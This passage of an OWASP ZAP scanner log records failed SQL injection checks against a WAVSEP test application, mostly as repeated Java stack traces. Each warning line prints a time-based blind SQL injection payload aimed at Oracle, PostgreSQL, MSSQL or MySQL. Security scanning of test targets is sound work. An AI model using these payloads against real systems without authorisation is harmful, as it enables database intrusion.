org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681300 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(108)||CHR(85)||CHR(100),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(108)||CHR(85)||CHR(100),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681301 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681301 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681302 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(76)||CHR(88)||CHR(111),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(76)||CHR(88)||CHR(111),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681303 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(121)||CHR(77)||CHR(66),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(121)||CHR(77)||CHR(66),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681303 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681304 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(87)||CHR(71)||CHR(82),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(87)||CHR(71)||CHR(82),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681305 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681306 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND (SELECT * FROM (SELECT(SLEEP(5)))Zicl) AND (2041=2041] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) AND (SELECT * FROM (SELECT(SLEEP(5)))Zicl) AND (2041=2041 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681306 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681307 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681307 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND (SELECT * FROM (SELECT(SLEEP(5)))rTiT)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND (SELECT * FROM (SELECT(SLEEP(5)))rTiT) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681308 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND (SELECT * FROM (SELECT(SLEEP(5)))gcJG) AND ('UNvo'='UNvo] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') AND (SELECT * FROM (SELECT(SLEEP(5)))gcJG) AND ('UNvo'='UNvo at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681309 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt;WAITFOR DELAY 